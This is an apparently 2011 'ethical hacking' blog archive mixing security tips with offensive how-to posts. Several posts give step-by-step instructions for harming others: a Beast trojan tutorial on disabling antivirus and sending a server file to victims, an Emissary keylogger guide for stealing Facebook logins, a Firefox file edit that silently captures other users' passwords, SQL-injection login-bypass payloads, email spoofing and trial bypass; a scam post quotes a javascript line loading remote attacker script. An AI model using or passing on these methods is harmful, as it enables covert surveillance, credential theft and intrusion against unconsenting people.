Pages

Friday, September 16, 2011

How To Find Microsoft Office 2010 Product Key

ProduKey

                                  
Produkey is an excellent software which can be used to extract your Microsoft Office 2010 within few seconds, and the best part is that you don't even need to install the program and it can be carried out anywhere in USB or CD.

Product Key Finder

                                 
Product key is another great small program which can help you recover your microsoft office 2010 product, it  does not only support Microsoft Office 2010 Product key but it can be used to extract other programs as well.

Monday, September 12, 2011

Check Your Antivirus Working Properly

                                              

Have you ever tried to test whether your antivirus is working properly or not? The test for this purpose is called EICAR Test. This test is used by many antivirus developers to find whether there antivirus is working properly or not.Here is a step-by-step procedure to test your antivirus:

1. Open a new text document, Click start menu goto run and type wordpad or notepad

     Type there the following code and save it as testfile.com
     X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
2. Now run Antivirus scan

If your antivirus detects it as a virus then your Antivirus is working properly and If it does not detect it as a virus then your antivirus is not effective and you need to look for alternatives.

Wednesday, June 15, 2011

Beware of Spams on Facebook

Recently you must have seen a spam such as 'Know Who Is Viewing your Profile' a Facebook Spam.

                                                                                         
 
How this scam post in other walls also without your knowledge?
 if the one of your friends click the link because of curiosity.  The link can detect his IP address.  Based on the IP address , it will say display the info as:

"5 users are currently viewing your profile from Delhi.
Follow the Steps to Reveal them"

The above info is just fake.  if you follow the steps , you will become victim of this scam.

It will ask you to paste the JavaScript into the address bar while using the Facebook.  The javascript it ask you to enter this is
javascript:(a=(b=document).createElement('script')).src='http://www.ajnachakra/com/js.js?'+Math.random(),b.body.appendChild(a);void(0)

If you copy and paste bold text , It will show the malcious JavaScript.  This JavaScript spread the spam message by posting in
  •  In the Chat Messages to Friends
  •  To the Inbox of Friends
  •  To the Walls of Friends
  •  At your own Wall
Fortunately , URL shorten service "is.gd" block the URL of the attacker.  So this spam message will not infect further.  

Saturday, May 14, 2011

Create More Than One Facebook Account With Single Email

Hi, Sorry for the delay of the post ........
To proceed with this trick you will need a gmail account (only gmail is permitted, others will not work in this way). Gmail does not have a stringent security feature in case of email address such as dot(.) in the email id.
So check out the following addresses , they are same only diffirence with the dot(.)

ethical.hacker@gmail.com
ethic.alhacker@gmail.com
ethicalhac.ker@gmail.com

                                     

Sign up in the facebook with any of the email addresses above and the account will be actually associated with the single gmail account.
Facebook has not yet implemented to block this way of registration.

Monday, May 2, 2011

"Shortened URL's" they could be dangerous

Now, many of you must be thinking why is there a need to shorten a URL?? There could be several reasons such as save character space, looks attractive and no one can know where's the link diverting? 

Some reasons may be good for us but some such as " where's the link diverting? " may be a great problem.It can be troublesome if anyone use these service to make anyone fool.
          

So, if you are aware of these issues then long URL for Firefox can be very useful to you. Long URL replaces short urls with the originals so you can see where links actually link to. Short urls (eg http://tinyurl.com/123) simply redirect to some other page on the internet – you can’t tell what website they link to by looking at the link. This plugin fixes this by transparently replacing any of these links when every web page loads.                                                           
It is a free Firefox browser addon, that replaces short urls, on the the fly, with the originals so you can see where the links actually link to. With this tool you can actually tell if you have been to that page already or not.

Wednesday, April 20, 2011

Search Engine for Hackers

A new search engine has been introduced called "SHODAN" that lets you find specific computers (routers, servers, etc.) using a variety of filters. Some have also described it as a public port scan directory or a search engine of banners.


Web search engines, such as Google and Bing, are great for finding websites. But what if you're interested in finding computers running a certain piece of software (such as Apache)? Or if you want to know which version of Microsoft IIS is the most popular? Or you want to see how many anonymous FTP servers there are? Maybe a new vulnerability came out and you want to see how many hosts it could infect? Traditional web search engines don't let you answer those questions.

Following things could be searched for:
  • country: 2-letter country code
  • hostname: full or partial host name
  • net: IP range using CIDR notation (ex: 18.7.7.0/24 )
  • port: 21, 22, 23 or 80

As we [some of us] can understand, it is very easy to find vulnerable host just by looking at all the banner responses shown by SHODAN. It could turn out to be a huge threat as many skiddies could be scanning hosts anonymously round the clock for particular exploit or something that they understand well.


Click here to go to SHODAN

Saturday, April 9, 2011

Orkut Control Panel

                                                                    
Let the browsing in orkut be on your finger tips. A menu will float over your orkut window which will have one touch links to various frequently browsed Orkut pages such as albums, scrapbooks, etc.

First Login to your Orkut Account then visit the following address for accessing Orkut Control Panel.

                                          Access Orkut Control Panel via URL

Sunday, April 3, 2011

7 Must Have Tools For Every Hacker

Its been a while since I have posted about some hacking tools and with increasing number of emails asking me to do an  article on it,I finally decided to cover it up.Hacking tools are developed by some really good coders out there to ease out many complex tasks which have to be done manually and took painstakingly great deal of time and effort.All these tools provided here are free of cost,are tried hands on and are being actively developed by community,and if not,their alternatives are provided.To summarize it up,these are the 7 must have tools for every hacker out there.

1. Nmap
                                                         
      I think everyone has heard of this one, it recently had a version 5 release.
Nmap (Network Mapper) is a free open source utility for network exploration or security auditing. It was designed to rapidly scan large networks, although it works fine against single hosts.Many systems and network administrators also find it useful for tasks such as network inventory, managing service upgrade schedules, and monitoring host or service uptime. Nmap uses raw IP packets in novel ways to determine what hosts are available on the network, what services (application name and version) those hosts are offering, what operating systems (and OS versions) they are running, what type of packet filters/firewalls are in use,and dozens of other characteristics. It may be used to discover computers and services on a computer network, thus creating a "map" of the network.Nmap runs on most types of computers and both console and graphical versions are available. Nmap is free and open source.Can be used by beginners (-sT) or by pros alike (packet_trace). A very versatile tool, once you fully understand the results.



DOWNLOAD NMAP

2. Nessus Remote Security Scanner
                                                              
      Recently went closed source, but is still essentially free. Works with a client-server framework.Nessus is the worlds  most popular vulnerability scanner used in over 75,000 organizations world-wide. Many of the worlds largest organizations are realizing significant cost savings by using Nessus to audit business-critical enterprise devices and applications.

DOWNLOAD NESSUS 

3. Wireshark 
                                                  
      Wireshark is a GTK+-based  network protocol analyzer, or sniffer, that lets you capture and interactively browse the contents of network frames. The goal of the project is to create a commercial-quality analyzer for Unix and to give Wireshark features that are missing from closed-source sniffers. Works great on both Linux and Windows (with a GUI), easy to use and can reconstruct TCP/IP Streams! .


DOWNLOAD WIRESHARK 

4. Cain and Abel 
                                                  
      The swiss knife of hacking tools..Cain & Abel is a password recovery tool for Microsoft Operating Systems. It allows easy recovery of various kind of passwords by sniffing the network, cracking encrypted passwords using Dictionary, Brute-Force and Cryptanalysis attacks, recording VoIP conversations, decoding scrambled passwords, revealing password boxes, uncovering cached passwords and analyzing routing protocols.The program does not exploit any software vulnerabilities or bugs that could not be fixed with little effort.




DOWNLOAD CAIN & ABEL



5. Kismet 

                                                      
 
       Kismet is an 802.11 layer2 wireless network detector, sniffer, and intrusion detection system. Kismet will work with  any wireless card which supports raw monitoring (rfmon) mode, and can sniff 802.11b, 802.11a, and 802.11g traffic. A good wireless tool as long as your card supports rfmon



DOWNLOAD KISMET 


6. NetStumbler
                                  
                                                                                   
        Yes a decent wireless tool for Windows! Sadly not as powerful as it’s Linux counterparts, but it’s easy to use and has a  nice interface, good for the basics of war-driving. NetStumbler is a tool for Windows that allows you to detect Wireless Local Area Networks (WLANs) using 802.11b, 802.11a and 802.11g. It has many uses:

  1. Verify that your network is set up the way you intended.
  2. Find locations with poor coverage in your WLAN.
  3. Detect other networks that may be causing interference on your network.
  4. Detect unauthorized rogue access points in your workplace.
  5. Help aim directional antennas for long-haul WLAN links.
  6. Use it recreationally for WarDriving. 
DOWNLOAD NETSTUMBLER

7. SuperScan
Powerful TCP port scanner, pinger, resolver. SuperScan 4 is an update of the highly popular Windows port scanning tool, SuperScan.If you need an alternative for nmap on Windows with a decent interface, I suggest you check this out, it’s pretty nice.

DOWNLOAD SUPERSCAN

Tuesday, March 29, 2011

Beast 2.07

                                                                           

First of all, I would like to say, that this tutorial has been provided for educational use, and that is its sole purpose



Now before we get into anything too complicated, I would like to explain (very simply) about how trojan horses work. They are not your average virus, they give you the power to connect to a 'victim' remotely, and do a variety of things. Anything, to be precise. There are 2 main components to a trojan, a client (the tool you use to connect to the victim), and the server (the file the the victim runs which enables you to connect to him). The client is used to create server.exe files with custom settings which you specify to enable successful connections.

Sometimes the AV will delete the files or tamper with them, so to be on the safe side shut down your AV then re-download or re-extract the files to be sure they are in correct working order. Note, you will most likely need to manually kill all the processes associated with your anti-virus in order to successfully terminate it.

Dont be alarmed, this file will not harm you whatsoever. When your antivirus dissembled this file, it containted strings that the antivirus deemed harmful, because it finds these same strings in viruses. (geeeezzz i wonder why ... Could it be that this tool creates viruses? :?) So id suggest turning off your antivirus just while you build the server, and while you send it to 'people', because your AV will prevent you from opening the client and will delete any server files you attempt to create.

This tutorial is written and designed around the Beast 2.07 Trojan. It is the most advanced version of the beast, and still remains the best by far. Its loaded with features and is simply hard to beat.

In this tutorial, I will explain how to configure a simple yet effective server file, and also explain what do do from there, and how to obtain valuable D2 Information once connected.

========
Part 1: Creating your Server and Examining The Beast
========

This step, believe it or not, is one of the most important. There are tons of options you can have when making a server file, but most arent necessary and increase chances of detection. This section will explain what is necessary and what isnt, and how to make the smallest server possible.

*NOTE* You should have disabled your AV by now.

Step one, would be to load Beast2.07.exe, after you have download Beast2.07.zip and extracted its contents. As you can see, beast has a friendly layout and is easy to use once you are properly educated.

Right on the main screen are 3 important text-fields, and a 2 important buttons.

Fields:
Host (Where the victims IP goes)
Post (Port you specify)
Password (password you Specify)
Go Beast (Connect to Victim)
Build Server (Create a custom server)


~Other Stuff~

The host field is where the IP of the victim goes (will explain more about this later), port is where the port you specified goes, and password is where the password you specified goes. Go Beast sends the connection request, and if everything is right it will connect.

Build Server is the button you want for this example. This button allows the creation of a new, and unique server for your own personal use.

Go Ahead and click that now.

The program will immediately open up a new window, with 6 tabs on the lefthand side, and the first tab opens automatically. Now you might say, "OmG This is confusing help!" ... and thats what everyone said at first, but im here to help 8)

The first thing were going to do, Is configure your servers connection settings. Remember the port / password on the main page? Thats where you specify both of those values. Also, you set up connection information (injection, where it will reside, and other important details) here.

The first most important connection setting, is how it will actually connect. There are 2 options here, and I will explain how both of them work. There are a variety of things a victim could have that could hinder connection settings, such as a router or a computer firewall, or a router that has a firewall! If they have any of these things, chances are slim you will not be able to connect to them, but there are ways around that you will come to find.

1) SIN Connection
A SIN connection is a reverse connection .. specifically designed for people using routers. When an individual has a router, it will prevent you from directly connecting to them ... so instead of you connecting the server, the server connects to you. However, SIN does not work that much and its not very effective to use.

2) Direct Connection: This method of connection allows you to connect right to the victims computer from your own. Its the most successful, and also the fastest / easiest way to get what you need.

So now, after reading that, lets go ahead and configure it. I will simply tell you what to put, and it will work

Wow .. finally! Click the 'Save Server' Button, and specify where you would like your server.exe file to go.

Download:

Thursday, March 24, 2011

Transfer Large files via Emails





 TransferBigFiles is the easiest way to share a bunch of files with friends, family or everybody in the world. There's no registration required to use the website. You can just go to the home page and start uploading some files. But to make the process even easier, we've created a Windows System Tray tool that allows users to drag-and-drop files to the site. We have not been able to find an easier tool for file sharing.

You can send files up to 2GB in single attachment. TransferBigFiles does not limit the amount of space your account can use on our servers, the only storage limit we have is that your files may not be larger then two (2) gigabytes. For a minimum of 5 days or up to 30-days if you upload through a registered DropZone account. DropZone users can also manage there files and expire them prior to 30-days.

For regular usage of this service you can use their client, if you want it.

TBF DropZone Client : It's the super-easy, super-fast, super-smart way to Transfer Big Files. It's FREE!

* System Tray Utility (for Windows)
* Drag 'n' Drop files to Send Files
* Auto-resume interruptions
* Upload up to 1gb per file
* 10-day Expiration
* Small footprint (~300kb)
* Fast, secure & reliable!
                                                                
Visit:
https://www.transferbigfiles.com/

Wednesday, March 16, 2011

Send Fake mails from any account to anyone

                                                   
There are some websites on the internet which allows you to send emails to any person. By using fake mail sender u can send emails to any email id by any email id (fake email id not necessary to exists). Suppose you know the email id of a person A. You want to send an email from the email id of person A. You can use these fake email sender website to do that. You can send email by any email id either it exists or not.

Try this fake mailer :- http://emkei.cz/

Tuesday, March 15, 2011

Hack to Bypass Trial Period Expiration

RunAsDate intercepts the kernel API calls that returns the current date and time (GetSystemTime, GetLocalTime, GetSystemTimeAsFileTime), and replaces the current date/time with the date/time that you specify. It works with Windows 2000, XP, 2003, Vista and 7. It works with 32 bit and 64 bit versions.


                                                                    
To Run your Software Forever follow these Steps Carefully

You have to follow these tips carefully to successfully hack a software and make it run in it’s trial mode forever.

1. Note down the date and time, when you install the software for the first time.

2. Once the trial period expires, you must always run the software using RunAsDate.

3. After the trial period is expired, do not run the software(program) directly. If you run the software directly even once, this hack may no longer work.

4. To avoid any chances of runnung the software program directly, you can delete its shortcut from the desktop and create a new shortcut using runasdate and place it on the desktop.

5. It is better and safe to inject the date of the last day in the trial period.

For example, if the trial period expires on jan 30 2010, always inject the date as jan 29 2010 in the RunAsDate.

Note: This software won’t work with Anti virus as they run in Background.

Download :
http://www.nirsoft.net/utils/run_as_date.html

Hide your IP address | download Quick Hide IP | Anonymous surfing

Quick Hide IP protects your online identity by hiding your IP address and replacing with a proxy server IP address.You will appear to access the internet from a different location, not your own (real) location. So all websites you are visiting see the IP address of the proxy server instead of your own IP address.

                                                
Key Features :

  • Hide your IP address from the web sites you visit.
  • Fully compatible with Internet Explorer, Chrome, Firefox, Opera.
  • Easy way to change proxy settings on the fly.
  • Automatically switch IP address every X minutes for better anonymous surfing.
  • Choose your favorite hidden geographic location all around the world.
  • Advanced proxy list testing and management.
Download:
http://www.easy-share.com/1914253346/Quick_Hide_IP_1.0_portable.rar

Thursday, March 10, 2011

Batch Programmnig Tool | Dr. Batcher

                                                 
Dr.Batcher is the simplest batch file editor available on market for batch programming. Using Dr.Batcher you can create batch file even if you have never done it before. If you know a lot about the creation of BAT and CMD files, Dr.Batcher is still useful for you. With Dr.Batcher you can use handy features of professional IDEs like syntax highlighting, code tooltips and bookmarks, that make writing code of batch file easier. Dr.Batcher really helps you to create bat files in easy and fast way!

Features:


•    Simple mode: create BAT files with visual editors and wizards
•    Professional mode: create BAT files with full-featured and highly customizable text 
     editor with syntax highlighting, code tooltips, lines numbering and bookmarks
•    Easy switching between different modes of batch file editor
•    Built-in support for most commonly used standard Windows and DOS commands
•    Support for easy search of additional information on commands in the Web via Google, 
      Yahoo, MSN Search
•    Support for looking through environment variables and copying their values
•    Expandability: easy to add new commands through XML files with their descriptions
•    Support for BAT scripts in Windows and DOS encoding, fast conversion of text from one      encoding to another 
•    Support for automatic updates
•    Exporting BAT files to HTML, RTF (Microsoft Word), TeX and printing them with syntax 
      highlight
•    Support for changing language of Dr.Batcher’s user interface
•    Windows 7 support
•    Templates and examples

Download: 

Tuesday, March 8, 2011

Download Premium Proxy Switcher | firefox addon

                                                       
Premium Proxy Switcher makes proxy usage user friendly. It can download proxy list automatically/manually, setup, switch proxy automatically/manually, enable or disable proxy easy and fast, with single click.

Important Features:-

1.    Automatically loads proxy servers every 1-30 minutes from our VIP zone or from user 
       specified URL.
2.    Automatically changes proxy server every 1-30 minutes, that in turn increases your 
       privacy level since your requests will be sent though different proxy servers.
3.    Setup any proxy server from available proxy list with just a single click.
4.    Manually switch proxy server to random one from the available proxy list with single 
       click
5.    Delete selected proxy server from the list if it is not working any more and switch to 
       random proxy server from available proxy list.
6.    Enable or Disable proxy server usage in Firefox with single click.
7.    Manually load proxy servers from our VIP section or user defined URL.
8.    Display proxy country in available proxy list menu, so user could easily select necessary
       one for that particular moment.
9.    Add shortcuts to all commands for those users who prefer to do everything fast (with 
       keyboard).
10.  The possibility to manage proxy list manually with help of keyboard.

Download Here: (For FIREFOX users)
https://addons.mozilla.org/firefox/downloads/latest/161958/addon-161958-latest.xpi?src=addondetail


Auto Save Passwords Without Notification in Firefox

                                                           
Hey friends. Today i am going to write about a simple firefox hack which help you to hack your friends easily. Whenever you try to login into any account, firefox shows a notification asking to store username and password for a particular website. But after using this trick it will never ask to store the password but it would automatically store all the passwords. This is an ideal trick if you want to get someones login details who uses your computer.
Follow these steps:

1) First of all you need to close firefox.
2) Now locate the nsloginmanagerprompter.js file which is normally found in
    C:\ProgramFiles\MozillaFirefox\Components\
3) Open nsloginmanagerprompter.js with notepad or other editor. But the editor which  
    would show the line number will be ideal.
4) Replace the entire line 804 to 869 with the following code
    var pwmgr = this._pwmgr;
    pwmgr.addLogin(aLogin);
   After replacing this, save this file.
Now it's done. yeppie....
To see the usernames + passwords, go to tools --> options --> security --> saved password




Monday, February 21, 2011

Bypass Login using SQL Injection

                                                        
For example, if a site has a login form to log into control panel & only registered users are allowed to enter the site. Now many times we want to login without such authentication i.e. bypassing the security barriers. If the programmer has properly sanitized the login scriptblock, then you be lucky to enter the site. But you may be able to login without knowing the actual username & password. This method basically deals with the DataBase server, so we use the term 'SQL Injection'. 
Let's consider an example, where username is 'administrator' and password is 'pass123' that is used to login to the site. Now the above authentication can be showcased using SQL as
SELECT USER from database WHERE username='administrator' AND password='pass123';
Here if you fire the query then it will be resulted as true and you would login successfully.
If this database is not properly sanitized by the programmer then it will automatically open the doors for Hackers.
So if you try the following combinations you would be able to login without knowing actual username and password
username: 'or1='1  password: 'or1='1
username: 'or'1'='1'  password: 'or'1'='1'
username: or1=1  password: or1=1
Thats all about bypassing login.


 

Friday, February 18, 2011

Hack Facebook using Keylogger

In this post i will discuss about how to hack facebook account without manually checking the victims computer. When you install a keylogger on the victims computer you need to manually check the tracked recorded activities. But in case of Emissary keylogger, it will mail you all the activities tracked by it and you also need not manually install the keylogger on the victims computer.
This keylogger will mail you all the keystrokes of the victim, screenshots,etc. It creates a server.exe file which is to be mailed to the victim after he clicks the server.exe file the kelogger is activated at this computer and all the activities are mailed to you after some time intervals. But to install this keylogger you need Microsoft's .net framework. Here is the stepwise procedure to use this keylogger.

Step 1:  Download Emissary Keylogger   

                                        

Step 2: Install by clicking the emissary.exe. Then enter you mail address where you want 
            the activities to mailed.

Step 3: After entering the mail address click on test to check the connection.

Step 4: After filling all the details click on build and file name as server.exe will be build in
           same directory on emissary keylogger.

Step 5: Now send this server.exe to the victim.

Step 6: Once the victim clicks the server.exe your keylogger will be activated.

Thursday, February 17, 2011

Secure Surfing in Cyber Cafes!!!!!!

Many a times, we need to surf internet in cyber cafes which may not be secure because it is the system which is commonly shared by many people. So, there are many ways to capture your data through such an unsecured network. You may be aware that a keylogger or some screen shot saver may be tracking your activities which may be accessed by others. So there are some precautions that are to be taken while surfing in a cyber cafe.

                                                     
1. Check whether the system is protected by an antivirus.
2. While accessing your private account your browser asks whether to save your username 
    & password always select 'NO' for such questions.
3. Before leaving check whether you logged off your account properly.
4. While leaving your system always clear the history and alwo your file that you   
    downloaded

Monday, February 7, 2011

We say, IPv4 is depleting! but what about Class E addresses?

                                            
As per our basic knowledge of IP addresses,  they are divided into 5 classes i.e. from A to E. Class A,B & C addresses are used for general unicast addressing whereas Class D is used for multicast addressing and Class E was reserved for the future use.
There were two drafts proposed for resolving this situation. According to these two drafts, at the present time, most IP implementations consider any IP address in the range 240.0.0.0 through 255.255.255.255 to be invalid as the source or destination of a datagram. The check for such "illegal" addresses may occur in many places, including at datagram receipt, before IP datagram transmission, when an IP address is assigned to a network interface, or even by router and firewall configuration parsers.
Also the TCP/IP stack in Windows do not support Class E address so they were not in the position to communicate with each other.




Sunday, February 6, 2011

Cisco Releases Security Specialist Certification in INDIA

Cisco has introduced new Security Specialist certifications to recognize individuals who have attained competencies in network security skills that align with evolving job roles, technologies and business requirements.

The Cisco Security certification portfolio now supports six key technologies with certifications for these Security Specialists including Cisco IPS Specialist, Cisco NAC Specialist, Cisco ASA Specialist, and the new Cisco IOS Security Specialist, Cisco Firewall Security Specialist and Cisco VPN Security Specialist

The Cisco IOS Security Specialist certification recognizes security professionals who demonstrate the hands-on knowledge and skills that are required to secure networks, using Cisco IOS Security features embedded in the latest Cisco routers and switches as well as the widely deployed Cisco security appliances.

The Cisco VPN Security Specialist certification recognizes security professionals with the skills and knowledge to configure, maintain, troubleshoot and support various VPN solutions, using Cisco IOS Software and the robust Cisco ASA adaptive security appliance.

Saturday, February 5, 2011

Embedded Passwords can be Dangerous!!!!!!

                                                         
As the devices in a network from the home router to some systems uses a default or an in built password and some identity information. But such usernames and passwords may not be safe (i.e. they may be sometimes publicly known). But to avoid this the concerned authority may change their information to overcome such a setback but it is not the case always.

Tuesday, February 1, 2011

Facebook - Favorite Target of Phishers

                                                   
The report, which covered the period between January and March of this year, next stated, though, "Facebook popped up unexpectedly in fourth place. This was the first time since we started monitoring that attacks on a social networking site have been so prolific."

By way of explanation, the report then continued, "Having stolen users' accounts, the fraudsters can then use them to distribute spam, sending bulk emails to the account owners and their friends in the network. This method of distributing spam allows huge audiences to be reached. Additionally, it lets the fraudsters take advantage of the social networking sites' additional options, like being able to send different requests, links to photo's and invitations, all with the advertisement attached, both within the network and to users' inboxes."

Sunday, January 30, 2011

Commencement of New Era!!!!!!

THE ERA OF SECURITY FREAKS

I had actually started blogging since many years but I didn't had my own blog which means it did not had any tag of my own. I am much interested towards security chapters in computing, well it also includes hacking (ethical). But many of the times people ignore the security perspective in their daily computing, i can be much more disastrous than our expectations.
The main scenario behind everything is that we must be at least capable of securing our own data from the intruders. I will try my best to post fast and easiest ways to secure your information through various methodology.



If you think technology can solve your security problems, then you don't understand the problems and you don't understand the technology. -Bruce Schneier


I have just started posting on my blog and I will try my best to keep on posting more about my life and interests.  Even the visitors can approach me to post their experiences and views.